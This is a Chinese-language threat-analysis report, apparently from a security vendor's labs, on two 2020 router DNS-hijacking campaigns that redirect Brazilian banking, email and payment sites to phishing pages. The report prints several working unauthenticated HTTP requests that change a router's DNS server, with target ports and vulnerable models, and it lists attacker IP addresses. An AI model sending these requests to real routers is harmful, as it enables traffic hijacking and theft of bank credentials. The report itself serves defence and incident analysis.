劫持你家路由器-路由器如何劫持
執行摘要
DNS劫持危害嚴重,會給用戶帶來糟糕的網絡訪問體驗,也有可能威脅到用戶的數據乃至財產安全。在2020年,我們通過綠盟威脅捕獲系統捕獲到兩起DNS劫持事件,本文將對其進行分析,并將重點放在正在發生的第二起事件上。
攻擊者進行DNS劫持的流程為:首先對暴露在互聯網上的存在未授權DNS修改漏洞的路由器進行攻擊,將其DNS服務器地址改為攻擊者的惡意DNS服務器;之后,當用戶訪問攻擊者劫持的域名時,會訪問到釣魚網站,頁面中會誘導用戶輸入賬號密碼、銀行卡號等敏感信息;最后,攻擊者利用收集到的敏感信息獲利。
本文的關鍵發現如下:
2020年至今,我們共捕獲到2起DNS劫持事件。第一起攻擊主要集中在5月24日,攻擊源只有1個,第二起攻擊在8月18日首次被我們捕獲到,截至筆者行文,該攻擊還在進行中。
在第一起劫持事件中,攻擊源在短時間內進行了全球范圍的攻擊,目標端口是80和8080,共使用了4類遠程DNS修改(Remote DNS Change)漏洞。
在第二起劫持事件中,攻擊者從8月18日起持續進行全球范圍的攻擊,目標端口是80、81、82、8080和8182,攻擊者僅利用了一種攻擊方式,但是,我們在Exploit-DB中共發現18條相關的漏洞信息 ,涉及多個廠商的路由器。
第二起攻擊的攻擊源有27個,77.8%的攻擊源位于荷蘭,其余攻擊源位于美國。這些IP均來自同一ASN(AS14061),所屬ISP為DIGITALOCEAN-ASN。綠盟威脅情報中心的數據顯示,85.2%的IP有IDC標簽。
發生DNS劫持后,路由器的首選DNS服務器會被篡改為149.56.152.185。我們對Alexa排名前 1萬的域名解析數據進行了分析,發現攻擊者的攻擊目標主要為電子郵箱、銀行和通用的娛樂、電商、支付平臺類網站。采集的個人信息包括電子郵箱賬戶、支票賬戶、網絡銀行賬號、銀行卡號和相關銀行卡信息及其密碼等。攻擊者劫持的大部分域名為巴西的域名,并且我們發現了用葡萄牙語編寫的代碼,因此,我們判斷攻擊者的攻擊目標以巴西為主,并且攻擊者很有可能是巴西人。
我們利用綠盟威脅情報中心的資產數據對潛在受影響的設備分布情況進行了評估。我們發現真正暴露在巴西的主要是Beetel公司的BCM96338這一型號的路由器,但其暴露數量也僅為361臺。假定不存在未被識別出的設備,那么本次DNS劫持事件對巴西的影響有限。但是由于攻擊者的掃描是全球范圍的,其他國家的設備的DNS也存在被篡改的可能。不過即便被篡改,根據我們對劫持目標的分析,其他國家受影響的用戶的數據泄露的可能性也比較小。
由于廠商設備型號眾多,未被披露的型號同樣可能存在相同的漏洞。從廠商角度來看,TP-LINK、ASUS和D-Link路由器的全球暴露數量均超過百萬,而在巴西,這三個廠商的設備也有一定的暴露面。
針對DNS劫持的防護,我們建議,在網頁出現異常時提高警惕,為系統指定DNS服務器,及時將路由器固件升級為最新版本等。
1. 簡介
1.1 什么是DNS劫持
DNS,即Domain Name System(域名系統)[1],是一種將域名解析為計算機能夠識別的網絡地址(IP地址)的系統,是Internet的重要組成部分。DNS劫持指DNS服務器的擁有者(或攻擊者)惡意將某域名指向錯誤的IP。
1.2 DNS劫持的危害
DNS劫持危害主要有以下五點:
(1)無法訪問某些域名,表現為連接超時等。
(2)訪問某些域名時跳轉到其他網站,如訪問Google卻跳轉到百度頁面。
(3)當訪問到錯誤的域名時,跳轉到廣告頁面。
(4)訪問某些域名時,頁面增加了廣告信息。主要針對靜態網頁。
(5)劫持到模仿真實網站做成的假網站,從而竊取用戶名、密碼甚至銀行卡卡號、密碼等惡意行為。很多情況下難辨真偽。
前四點會為用戶帶來糟糕的體驗,以及為DNS擁有者帶來一筆不菲的收入。而最后一點直接威脅到用戶的數據乃至財產安全,是非常嚴重的。
1.3 DNS劫持是如何發生的
DNS劫持的發生,主要有兩種可能:
(1)ISP(網絡服務提供商)提供的DNS出現問題,或是趨于利益,或是遭到攻擊。
(2)設備(路由器、用戶設備等)的DNS相關設置被惡意篡改。
2. DNS劫持威脅分析
2.1 攻擊趨勢分析
我們對DNS劫持相關日志進行了分析,如圖 2.1 所示,2020年至今,我們共捕獲到2起DNS劫持行為。第一起攻擊主要集中在5月24日,攻擊源只有1個,第二起攻擊在8月18日首次被我們捕獲到,截至筆者行文,該攻擊還在進行中。本章也將主要對第二起攻擊進行分析。
圖 2.1 DNS劫持攻擊趨勢分析
2.2 攻擊手法
2.2.1 第一起DNS劫持事件
在第一起劫持事件中,攻擊源只有一個,在短時間內進行了全球范圍的攻擊,目標端口是80和8080,共使用了4類遠程DNS修改(Remote DNS Change)漏洞。
漏洞1:
攻擊手法:
GET /dnscfg.cgi?dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
目標端口:80、8080
目標設備:我們在Exploit-DB中共發現18條相關的記錄[①],涉及多個廠商的路由器,包括D-Link、UTstarcom、Beetel、iBall Baton、Tenda、Pirelli、Exper、ASUS、COMTREND、PLANET、inteno、TP-LINK、Shuttle Tech等。
漏洞2:
攻擊手法:
GET /Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8
目標端口:80、8080
目標設備:D-Link DSL-2640R(EDB-ID: 43678)、DSL-2740R(EDB-ID: 35917)。
漏洞3:
攻擊手法:
GET /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
目標端口:80、8080
目標設備:D-Link DSL-2640B(EDB-ID: 36105)。
漏洞4:
攻擊手法:
GET /goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=111.90.159.53&DS2=8.8.8.8 HTTP/1.1
目標端口:8080
目標設備:我們在Exploit-DB中共發現7條相關的記錄,涉及多個廠商的路由器,包括Secutech、Tenda、Unicon等。
2.2.2 第二起DNS劫持事件
在第二起劫持事件中,攻擊源有27個,8月18日起持續進行全球范圍的攻擊,目標端口是80、81、82、8080和8182,攻擊方式唯一,采用了上一節提到的漏洞1。
攻擊手法:
GET /dnscfg.cgi?dnsPrimary=149.56.152.185&dnsSecondary8.8.4.4&dnsDynamic=0&dnsRefresh=1
從上述攻擊手法中我們也可以看到,攻擊者在dnsSecondary和8.8.4.4之間忘記寫“=”了,這將導致目標設備的dnsSecondary并不會被攻擊者所改變。
2.3 攻擊源分析
說明:本節的攻擊源分析僅針對第二起攻擊。
2.3.1 攻擊源國家分布
我們共捕獲到27個攻擊源的DNS篡改行為,這些攻擊源分布很集中,77.8%的攻擊源位于荷蘭,其余攻擊源位于美國。我們發現這些IP均來自同一ASN(AS14061),所屬ISP為DIGITALOCEAN-ASN。綠盟威脅情報中心的數據顯示,85.2%的IP均有IDC標簽。因此,一個合理的推測是,這些IP存在漏洞,被攻擊者攻破后進行DNS劫持攻擊。
2.3.2 攻擊源開放端口分布
圖 2.2 是攻擊源主要開放的端口的分布情況,這些攻擊源中,大部分開放了22、443和80端口。
圖 2.2 攻擊源主要開放端口分布情況
2.4 攻擊者服務器信息
目前已知存在DNS劫持現象的服務器地址是149.56.152.185,通過遍歷Alexa的Top1M域名列表[2]的前一萬域名,找到了部分異常情況,這些域名被劫持到了攻擊者的IP。在一段時間內,我們檢測到這個IP是在變化的,依次為:149.56.79.208、107.23.99.48、149.56.79.215。截止發文時,最后一個IP仍然活躍。
149.56.152.185、149.56.79.208、149.56.79.215位于加拿大魁北克省博阿努瓦,運營商為ovh.com。107.23.99.48位于美國弗吉尼亞州阿什本,運營商amazon.com。表 2.1 和表 2.2 分別是149.56.152.185和149.56.79.215的端口開放情況。
表 2.1 149.56.152.185端口開放情況
表 2.2 149.56.79.215端口開放情況
2.5 DNS劫持目標分析
攻擊目標主要為巴西電子郵箱類、銀行類,還有和財產相關的通用娛樂電商支付平臺類。采集的個人信息包括電子郵箱賬戶、支票賬戶、網絡銀行賬號、銀行卡號和相關銀行卡信息及其密碼等。另外,還有CPF碼(巴西納稅人標識)以及持卡人姓名等,是巴西納稅人的重要信息。可見攻擊者目標明確,對財產方面感興趣。另外我們注意到[3],有攻擊者在2019年3月,也對類似的域名進行過劫持。
所有的假頁面有一些共同點:
一是HTML結構簡單,幾乎無CSS,而用整頁圖片替代;
二是采用PHP生成網頁,還有少量JavaScript文件用于檢測輸入信息的合法性;
三是僅有登陸功能可用,其余大部分超鏈接無法使用或者鏈接到404頁面;
四是均為HTTP協議,無法通過HTTPS訪問;
五是大部分網頁為葡萄牙語(巴西官方語言),被攻擊的域名也以巴西域名(br后綴)為主,且發現了用葡萄牙語編寫的代碼,猜測攻擊者為巴西人可能性較大。
以下為具體案例:
a) outlook.com,Outlook郵箱
打開后顯示葡萄牙語登錄頁面。隨意輸入郵箱和密碼后跳轉到br.msn.com,并提示找不到服務器IP。猜測攻擊者希望跳轉到真實頁面,但未實現。
b) live.com,Outlook郵箱
同上。
c) msn.com,MSN門戶
顯示為Outlock郵箱登陸頁面,同上。
d) terra.com.br,Terra郵箱(巴西)
主頁所有鏈接打開后均為404,可以輸入用戶名和密碼,輸入后點擊登錄仍跳回主頁。
e) bradesco.com.br,Bradesco銀行(巴西)
打開主頁僅有頂部可用,要求輸入機構編號和用戶支票賬號,點擊ok后跳轉到404頁面。(猜測是攻擊者尚未配置完畢)
f) caixa.gov.br,CAIXA銀行(巴西)
圖 2.3 CAIXA銀行的真實頁面(上)和攻擊者偽造頁面(下)
圖 2.3 是巴西CAIXA銀行的真實頁面和攻擊者偽造頁面,雖然看起來很像,但后者僅有登陸功能。
訪問被劫持頁面,主頁僅有一個登陸按鈕,其余為單純圖片,點擊無反應。
點進去后要求輸入用戶名,并選擇個人、法人或政府。用戶名要求10至20位。隨意輸入即可進入到下一級。
要求輸入網絡銀行密碼。頁面彈窗提示用網頁的虛擬鍵盤錄入,但實際上僅能通過鍵盤錄入。這應該是攻擊者尚未完善。隨意輸入進入下一級。
稱當前計算機需要登記后才能訪問,閱讀后進入下一級。
要求輸入CPF碼(巴西納稅人碼)、銀行卡號、計算機昵稱。這里CPF有合法性檢查,我們編造了一個合法的CPF: 12345836407,成功進入下一級。值得一提的是,此處檢查CPF合法性的JavaScript,使用葡萄牙語編寫的,猜測攻擊者為巴西人可能性較大。
選擇計算機登記時間:永久、1至365天、僅此一次,選擇后進入下一級。
顯示計算機成功登記。進入下一級。
要求輸入數字密碼。限制六位,隨意輸入進入下一級。
確認數字密碼,限制六位,無需與上次相同,提示成功,然后顯示為一片空白。
g) santander.com.br,Santander銀行(巴西)
圖 2.4 Santander銀行的真實頁面(上)和攻擊者偽造頁面(下)
圖 2.4 是巴西Santander銀行的真實頁面和攻擊者偽造頁面,后者僅有登陸功能。其主頁提供兩種登陸方式:CPF碼或機構編號、用戶支票賬號。
CPF碼有合法性檢查,編造了合法的CPF 12345836407后要求輸入登陸密碼,隨意輸入后要求輸入電話號碼、CVV碼、6位或8位超級數字密碼(姑且這樣翻譯吧,實在看不懂葡萄牙語)、4位數字密碼。隨意輸入后要求輸入密碼卡, 包含50個4位數和卡號。隨意輸入后要求輸入卡號和簽發日期,日期有合法性檢查。隨后顯示成功信息。
隨意輸入機構編號、用戶支票賬號后跳轉到登陸頁面,要求輸入用戶名和密碼。隨意輸入后進入下一級,顯示先前輸入的支票賬號,要求輸入支票密碼、設備序列號和令牌(這應該是一種安全驗證設備)。滿足位數限制,隨意輸入后顯示成功開通網上銀行。
h) santandernet.com.br,Santander銀行(巴西)
同上。
i) itau.com.br,Itau銀行(巴西)
所采集信息基本與上銀行網站同,不做贅述。
j) bb.com.br,巴西銀行
所采集信息基本與上銀行網站同,不做贅述。
k) citibank.com,花旗銀行
404 Not Found。猜測是攻擊者尚未配置完畢。
l) netflix.com,Netflix視頻網站
圖 2.5 攻擊者偽造的Netflix頁面
圖 2.5 是攻擊者偽造的Netflix頁面,要求填寫銀行卡信息,打開主頁后只有登錄按鈕可用,其余跳轉到404頁面。這里在一段時間內發現兩種情況:
點擊登錄后提示可免費獲取一個月會員,要求輸入郵箱和密碼。隨意輸入后進入下一級,要求輸入銀行卡信息,包含名、姓、CPF、卡號、簽發日期、CVV碼。隨意輸入后提示成功。
點擊登錄后要求輸入郵箱和密碼,提示用戶被暫停,需要驗證賬戶,要求輸入銀行卡信息,包含名、姓、CPF、卡號、簽發日期、CVV碼。隨意輸入后提示成功。
m) Americanas.com.br, Americanas電商平臺(巴西)
圖 2.6 Americanas電商平臺的真實頁面(上)和攻擊者偽造頁面(下)
圖 2.6 是Americanas電商平臺的真實頁面和攻擊者偽造頁面,兩者區別明顯。點擊登錄,要求輸入用戶名(郵箱)和Americanas密碼。提示可以兌換優惠券,要求輸入銀行卡號、簽發日期、持卡人姓名、CVV碼。隨意輸入后顯示優惠券碼。無論如何操作總顯示同一優惠券碼。
n) paypal.com, PayPal支付平臺
圖 2.7 攻擊者偽造的PayPal頁面
圖 2.7 是攻擊者偽造的PayPal頁面,主頁顯示英文界面,點擊登錄,要求輸入郵箱、密碼、全名、生日、國家、住址、城市、郵編、銀行卡號、簽發日期、CVV碼、密碼。
2.6 潛在受影響設備暴露情況分析
通過Exploit-DB,我們可以獲取存在遠程DNS修改漏洞的設備廠商和型號,因此,本節將從這兩個角度對潛在受影響的設備進行評估,數據來自綠盟威脅情報中心。由于劫持目標與巴西有關,除分析全球受影響情況外,我們也對巴西的受影響設備的分布情況進行了分析。
圖 2.8 是潛在受影響的設備型號的分布情況,在我們可識別的設備中,真正暴露在巴西的主要是Beetel公司的BCM96338這一型號的路由器,但其暴露數量也僅為361臺。從這個角度來看,假定不存在未被識別出的設備,那么本次DNS劫持事件對巴西的影響有限。但是由于攻擊者的掃描是全球范圍的,其他國家的設備的DNS也存在被篡改的可能,不過即便被篡改,根據我們對劫持目標的分析,其他國家受影響的用戶的數據泄露的可能性也比較小。
圖 2.8 潛在受影響設備暴露情況(設備廠商-型號)
圖 2.9 是潛在受影響的設備廠商的分布情況,之所以從這個角度來考慮,是因為Exploit-DB的數據僅為互聯網上披露出來的數據,但一個廠商設備型號眾多,未必會被全面進行測試,未被披露的型號同樣可能存在相同的漏洞。從圖 2.9 可以看出,TP-LINK、ASUS和D-Link路由器的全球暴露數量均超過百萬,而在巴西,這三個廠商的設備也有一定的暴露面。但是這些設備有多少的DNS可被篡改,我們就沒有進行驗證了。
圖 2.9 潛在受影響設備暴露情況(設備廠商)
3. 小結
本文首先對DNS劫持的成因和危害進行了介紹,之后介紹了今年我們捕獲到的兩起DNS劫持事件。
針對DNS劫持的防護,我們有如下建議:
當發現網頁出現異常時,如加載速度慢、顯示異常、功能缺失、要求錄入個人信息等,立即停止訪問,更換網絡環境或手動配置DNS后再試。
盡量使用HTTPS訪問網站。當HTTPS證書錯誤或僅能通過HTTP訪問時,謹慎操作,提高警惕(但這也有可能是管理員的疏忽導致的)。
一般情況下,系統(尤其Windows)自動選擇DNS服務器時,會采用上級所提供的。路由器也會以采用上級提供的DNS,即ISP(網絡服務提供商)的DNS服務器。如果路由器DNS因某些原因被篡改時,下屬設備就會受到影響。這種情況下只需要為系統指定DNS服務器即可避免DNS劫持攻擊。這里列舉一些公認的DNS服務器[4],具體延遲還需要自行測試,挑選速度快、穩定的DNS即可。
表 3.1 常用DNS服務器列表
防止路由器DNS設置被篡改是“治本”的方法。首先避免使用默認登陸密碼(如admin, guest等)和弱密碼(如123456, 88888888等);定期更新路由器固件,留意路由器廠商公布的漏洞信息,防止被黑客駭入;如果有條件,不把路由器IP(尤其是管理頁面)暴露在公網,為攻擊者留下可乘之機。限于IPv4地址數量,我國大部分家用寬帶無法分得公網IP,且運營商封禁了常用web端口(80, 8080, 443),也在一定程度上規避了發生的風險。
如果你追求更安全純凈的DNS服務,DoT(DNS over TLS)和DoH(DNS over HTTPS)或許是更好的選擇,代價是耗費更長的時間。本文不做贅述。
4. IoC
4.1 第一起DNS劫持事件
攻擊源:
51.159.71.63
惡意DNS服務器:
111.90.159.53
4.2 第二起DNS劫持事件
攻擊源:
134.209.194.220
134.209.205.83
157.245.69.183
161.35.82.213
161.35.90.137
165.22.206.34
167.172.47.178
178.62.204.69
178.62.205.16
178.62.206.207
178.62.208.183
178.62.208.240
178.62.211.51
178.62.227.36
178.62.244.184
178.62.244.210
178.62.244.220
178.62.244.234
178.62.244.245
178.62.245.27
178.62.245.40
188.166.24.138
188.166.26.148
188.166.29.118
188.166.29.173
64.225.66.217
64.225.78.202
惡意DNS服務器:
149.56.152.185
參考文獻
[1] Domain Name System, https://en.wikipedia.org/wiki/Domain_Name_System
[2] Alexa Top 1M, http://s3.amazonaws.com/alexa-static/top-1m.csv.zip
[3] PayPal, Netflix, Gmail, and Uber users among targets in new wave of DNS hijacking attacks, https://www.ixiacom.com/company/blog/paypal-netflix-gmail-and-uber-users-among-targets-new-wave-dns-hijacking-attacks
[4] 世界各地DNS服務器地址大全, http://ip.yqie.com/dns.htm
關于格物實驗室
格物實驗室專注于工業互聯網、物聯網和車聯網三大業務場景的安全研究。 致力于以場景為導向,智能設備為中心的漏洞挖掘、研究與安全分析,關注物聯網資產、漏洞、威脅分析。目前已發布多篇研究報告,包括《物聯網安全白皮書》、《物聯網安全年報2017》、《物聯網安全年報2018》、《物聯網安全年報2019》、《國內物聯網資產的暴露情況分析》、《智能設備安全分析手冊》等。與產品團隊聯合推出綠盟物聯網安全風控平臺,定位運營商行業物聯網卡的風險管控;推出固件安全檢測平臺,以便快速發現設備中可能存在的漏洞,以避免因弱口令、溢出等漏洞引起設備控制權限的泄露。
關于伏影實驗室
伏影實驗室專注于安全威脅與監測技術研究。 研究目標包括僵尸網絡威脅,DDoS對抗,WEB對抗,流行服務系統脆弱利用威脅、身份認證威脅,數字資產威脅,黑色產業威脅及新興威脅。通過掌控現網威脅來識別風險,緩解威脅傷害,為威脅對抗提供決策支撐。
綠盟威脅捕獲系統
網絡安全發展至今特別是隨著威脅情報的興起和虛擬化技術的不斷發展,欺騙技術也越來越受到各方的關注。欺騙技術就是威脅捕獲系統關鍵技術之一。它的高保真、高質量、鮮活性等特征,使之成為研究敵人的重要手段,同時實時捕獲一手威脅時間不再具有滯后性,非常適合威脅情報的時效性需求。
綠盟于2017年中旬運營了一套威脅捕獲系統,發展至今已逐步成熟,感知節點遍布世界五大洲,覆蓋了20多個國家,覆蓋常見服務、IOT服務,工控服務等。形成了以全端口模擬為基礎,智能交互服務為輔的混合型感知架構,每天從互聯網中捕獲大量的鮮活威脅情報,實時感知威脅。
[①] 我們在Exploit-DB中對關鍵詞“DNS change”進行檢索,并對結果進行了分類整理。
總結
以上是生活随笔為你收集整理的劫持你家路由器-路由器如何劫持的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: ICMAX解析光纤猫怎么连接无线路由器-
- 下一篇: 分享 iPhone “信息”应用的 3